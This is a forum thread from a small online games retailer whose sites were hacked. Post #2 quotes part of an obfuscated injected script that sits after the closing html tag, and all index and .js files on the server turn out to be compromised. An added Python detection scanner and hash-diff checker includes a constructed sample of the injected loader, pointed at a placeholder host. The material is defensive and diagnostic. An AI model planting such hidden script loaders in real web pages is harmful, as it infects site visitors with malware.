McAfee says it's 'blocked and removed a trojan' from my site
    Hi all,

    When I visit my own web site (www.legendgames.co.uk or www.rpgminiatures.co.uk) I get a pop-up from McAfee telling me it's blocked and removed a trojan.

    JS/Iframe.gen.d (trojan) ... Can anyone advise - is this just McAfee being paranoid?

    I'm assuming it's just Actinic code it's finding, as I don't think I'm infected by anything here, as I have McAfee running, a firewall, NAT and don't visit stupid web sites!

    Any advice?

    P.S. It doesn't report it on a couple of my other sites.

    andy
    Andy Warner

    www.legendgames.co.uk - rpgs, boardgames, dice and other geeky stuff
    www.RPGMiniatures.com D&D and Star Wars Miniatures

    Both running the Cart from Search Page hack

    Also www.mainlymurder.co.uk www.thegamesplace.co.uk and www.thediceplace.co.uk

    All running V8.5.2 Multisite on a Windows 7 quad PC, augmented by Mole End automation, from a single shared database, using Actinic-specific hosting from Host-IT.

    #2
    I think you may have a problem, at least with legendgames. When I visited I got redirected to a PDF with some weird stuff on it, then Windows killed my browser session.

    Looking on your source I see there's an odd script after the closing html tag (I removed the middle part to break the script):
    Code:
    <script>/*LGPL*/ try{ window.onload = function(){K7k4bqr2cny = 'h#t!t&(@p@(:$/&^&/(^!h@&@a$^^o@1@^&2^!)3^#-@#&!c!)&o!^&m).)$&t#@#($u@!.!(^t^^)&v)).!p))i^$c)@h(#u^(n$&$&t&#@e@&^^r!$-)c^&&
    
    ....I removed the middle part here....
    
    K7k4bqr2cny);Hfy0ow8p9qp.setAttribute('type', A4e0hnc3yfe);document.body.appendChild(Hfy0ow8p9qp);if (document){Mixz385ns6g8s = Qougyyn7mc;}} }  catch(Euzoqmhltegv2apxp5p3 ) {}</script>
    <!--648df64491841bd39ff59d873b6631b1-->



      #3
      There's obviously something there.

      General advice would be to change all FTP passwords, delete and completely refresh the website.
      Someone has got in there somehow (and you want to beat Google to finding/fixing it too or you'll be blacklisted and that takes a while to undo!)
      Tracey



        #4
        Kaspersky is reporting it's in actiniccore.js and actinicextras.js - could be others too but I bailed out
        Reusable Snore Earplugs : Sample Earplugs - Wax Earplugs - Women's Earplugs - Children's Earplugs - Music Earplugs - Sleep Masks



          #5
          Your other sites, e.g. mainlymurder, games and diceplace, are also infected.

          Looks like someone's had a fun time playing on your server - or on your PC.
          Last edited by guccij; 16-Jan-2010, 08:12 PM. Reason: to remove image - not required now


            #6
            Thanks - looking into it now.

            Thanks all,

            Looks like ALL index.* files on our entire server (all web sites) have been compromised - not sure how. Getting them zapped now, all passwords changed etc.

            Thanks again guys.

            andy

            P.S. It's only the one web server - our other server is fine, thus it's looking like a server breach, not a local infection migrating up to the server via Actinic.

            McAfee doesn't find anything.

            Interestingly ALL *.js and index*.* files have been hacked sitewide, in all directories, sub-directories etc., so I guess a script run on the server?
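Two things in this thread can be turned into a repeatable check: the odd `<script>` after the closing `</html>` tag that post #2 quotes, and the sitewide change to every index.* and *.js file that post #6 reports. The Python below is an added example, not code from the forum, from Actinic, McAfee or Kaspersky. It scans a local copy of a web root for the traits visible in the quoted script (markup after `</html>`, an empty `catch` that hides errors, a cluster of random-looking identifiers, dynamic element injection), then compares a SHA-256 manifest against a known-clean copy, which is the check behind the advice to refresh the site from scratch. The sample files are constructed; the junk-character string points at a placeholder `.invalid` host rather than the real one, and the thresholds are assumptions.

```python
"""Rule-based scan for the kind of injection described in the thread: an
obfuscated <script> appended after </html> in index.* pages and planted in
*.js files across the whole web root, plus a hash diff against a clean copy.
Constructed sample data; hypothetical helper, not part of Actinic or McAfee."""
import hashlib
import re
import tempfile
from pathlib import Path

# Identifiers like K7k4bqr2cny / Hfy0ow8p9qp (from the quoted script): a letter
# followed by 9+ alphanumerics that mix digits and letters.  Heuristic only.
RANDOM_IDENT_RE = re.compile(
    r"\b[A-Za-z](?=[A-Za-z0-9]*\d)(?=[A-Za-z0-9]*[A-Za-z])[A-Za-z0-9]{9,}\b")
# A <script> that sits after the closing </html> tag, where no markup belongs.
TRAILING_SCRIPT_RE = re.compile(r"</html>\s*<script\b.*?</script>", re.I | re.S)
# try { ... } catch (x) {} : an empty catch that hides any error the payload raises.
EMPTY_CATCH_RE = re.compile(r"try\s*\{.*?\}\s*catch\s*\(\s*\w+\s*\)\s*\{\s*\}", re.S)
# DOM calls used to plant a new element (iframe or script) into the page.
DOM_INJECT_TERMS = ("createElement", "setAttribute", "appendChild")
SCAN_SUFFIXES = {".html", ".htm", ".js"}
MIN_INDICATORS = 2  # assumed threshold: one heuristic alone is too noisy

# --- constructed samples (not the thread's real payload; loads nothing) ---
CLEAN_INDEX = ("<html><head><title>Shop</title>\n"
               '<script src="actiniccore.js"></script></head>\n'
               "<body><h1>Welcome</h1></body></html>\n")
CLEAN_JS = "function addToCart(id) { return '/cgi-bin/cart.pl?id=' + id; }\n"
INJECTED_BODY = (
    "/*LGPL*/ try{ window.onload = function(){"
    "K7k4bqr2cny = 'h#t!t&p:/^/p!l@a#c(e&h$o^l)d!e@r.i#n$v^a)l!i@d';"  # placeholder host
    "Hfy0ow8p9qp = document.createElement('script');A4e0hnc3yfe = 'text/javascript';"
    "Hfy0ow8p9qp.setAttribute('src', K7k4bqr2cny);"
    "Hfy0ow8p9qp.setAttribute('type', A4e0hnc3yfe);"
    "document.body.appendChild(Hfy0ow8p9qp);} } catch(Euzoqmhltegv2apxp5p3) {}")
INJECTED_TAIL = "<script>" + INJECTED_BODY + "</script>\n"


def suspicious_indicators(text: str) -> list[str]:
    """Return the injection indicators found in one file's text."""
    hits = []
    if TRAILING_SCRIPT_RE.search(text):
        hits.append("script after closing </html>")
    if EMPTY_CATCH_RE.search(text):
        hits.append("empty catch swallowing errors")
    idents = set(RANDOM_IDENT_RE.findall(text))
    if len(idents) >= 4:
        hits.append(f"{len(idents)} random-looking identifiers")
    if sum(term in text for term in DOM_INJECT_TERMS) >= 2:
        hits.append("dynamic DOM element injection")
    return hits


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk every .html/.htm/.js file under root; map relative path -> indicators
    for files that show at least MIN_INDICATORS of them."""
    flagged = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = suspicious_indicators(path.read_text(encoding="utf-8", errors="replace"))
            if len(hits) >= MIN_INDICATORS:
                flagged[path.relative_to(root).as_posix()] = hits
    return flagged


def build_manifest(root: Path) -> dict[str, str]:
    """Relative path -> SHA-256 for every file under root (take one from a clean copy)."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifest(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Files whose content changed, appeared or vanished relative to the clean copy."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> tuple[dict[str, list[str]], dict[str, list[str]]]:
    """Build a clean tree and a 'live' tree with the sitewide injection applied,
    then run both checks on the live tree."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "shop").mkdir(parents=True)
            for rel in ("index.html", "shop/index.html", "about.html"):
                (root / rel).write_text(CLEAN_INDEX, encoding="utf-8")
            (root / "actiniccore.js").write_text(CLEAN_JS, encoding="utf-8")
        # The injection as the thread describes it: every index.* page and every
        # .js file on the server; about.html is left alone.
        for rel in ("index.html", "shop/index.html"):
            (live / rel).write_text(CLEAN_INDEX + INJECTED_TAIL, encoding="utf-8")
        (live / "actiniccore.js").write_text(INJECTED_BODY + "\n" + CLEAN_JS, encoding="utf-8")
        return scan_tree(live), diff_manifest(build_manifest(clean), build_manifest(live))


if __name__ == "__main__":
    flagged, changes = demo()
    for rel, hits in flagged.items():
        print(f"{rel}: {', '.join(hits)}")
    print("changed vs clean copy:", changes)
```

The heuristic scan is useful when no clean copy exists, but the manifest diff is the reliable check: build the baseline from the local Actinic output or a backup taken before the incident, then any file the diff lists as modified or added on the server is a candidate for replacement, whatever it contains.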


              #7
              Originally posted by guccij
              Your other sites, e.g. mainlymurder, games and diceplace, are also infected.

              Looks like someone's had a fun time playing on your server - or on your PC.
              Thanks - can you check www.thediceplace.com again please - it's on a different server and I didn't get a warning with McAfee like I did on legendgames.

              Much appreciated.

              I think we're 90% clear now, just mopping up the outliers.

              Andy


                #8
                www.thediceplace.com looks fine - so do the others now. Scary few moments, huh?

                Only the index of www.mainlymurder.co.uk is showing but I guess you're still working on that.


                  #9
                  Oh yes - seems it wasn't only my server hit though, so that makes me feel a bit happier that I wasn't just being stupid with security.
                  Gotta tighten up now though.